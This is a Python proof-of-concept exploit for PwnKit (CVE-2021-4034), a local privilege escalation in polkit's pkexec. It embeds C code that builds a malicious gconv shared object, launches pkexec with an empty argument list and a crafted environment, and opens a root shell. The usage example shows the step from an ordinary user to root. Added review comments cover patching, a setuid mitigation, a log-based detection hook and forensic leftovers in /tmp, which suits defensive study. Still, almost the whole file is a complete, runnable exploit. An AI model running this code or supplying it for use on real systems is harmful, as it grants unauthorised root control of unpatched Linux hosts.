CVE-2021-4034 exploit in python
#!/bin/python
# Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by aynkl
"""
CVE information:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Usage:
$ id
uid=1000(user) gid=1001(user) groups=1001(user)
$ python3 CVE-2021-4034.py
# whoami
root
"""
import os | |
# NOTE(review): this is the public PwnKit proof of concept (CVE-2021-4034, see the
# Qualys link in the module docstring). It only has an effect on hosts whose
# polkit/pkexec has not been patched; the fix is to update polkit, and the usual
# interim mitigation is to drop the setuid bit from /usr/bin/pkexec — confirm
# against your distribution's advisory.
#
# `shell` holds the C source of a small launcher that the __main__ block below
# writes to /tmp/cve.c, compiles and runs. Everything the launcher does is
# visible in the string itself:
#   - it creates the directories 'GCONV_PATH=.' and 'pwnkit' in the current
#     directory (/tmp after the chdir below) plus the files 'GCONV_PATH=./pwnkit',
#     'pwnkit/gconv-modules', 'pwnkit/pwnkit.c' and 'pwnkit/pwnkit.so'; these are
#     useful forensic artefacts, because the payload's own `rm -rf` of
#     'GCONV_PATH=.' and 'pwnkit' only runs if the shared object is actually loaded;
#   - it compiles the embedded second C source (the inner `shell` char array) into
#     'pwnkit/pwnkit.so' with gcc, so gcc must be installed on the host;
#   - it execve()s /usr/bin/pkexec with an EMPTY argv and a crafted environment
#     (PATH=GCONV_PATH=., CHARSET=PWNKIT, SHELL=pwnkit).
#   pkexec is known to log a complaint when SHELL is not a shell listed in
#   /etc/shells; since this PoC sets SHELL=pwnkit, that log line is a widely used
#   detection hook — verify the exact message on your distribution.
# The inner payload (gconv_init) sets uid/gid and euid/egid to 0, resets PATH,
# removes the two directories above and spawns /bin/sh.
shell = """
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shell =
"#include <stdio.h>\\n"
"#include <stdlib.h>\\n"
"#include <unistd.h>\\n\\n"
"void gconv() {}\\n"
"void gconv_init() {\\n"
" setuid(0); setgid(0);\\n"
" seteuid(0); setegid(0);\\n"
" system(\\\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\\\");\\n"
" exit(0);\\n"
"}";
int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
"""
if __name__ == "__main__" :
    # Work in /tmp: every path the C launcher creates is relative to the cwd.
    os.chdir("/tmp")
    with open("cve.c" , "w") as fd :
        fd.write(shell)
        fd.close()  # redundant: the with-block already closes the file
    # Compiles the launcher, deletes the C source and runs the binary. The
    # compiled cve.o is NOT removed and remains in /tmp after the run — another
    # artefact worth looking for during incident response.
    os.system("gcc cve.c -o cve.o && rm cve.c && ./cve.o ")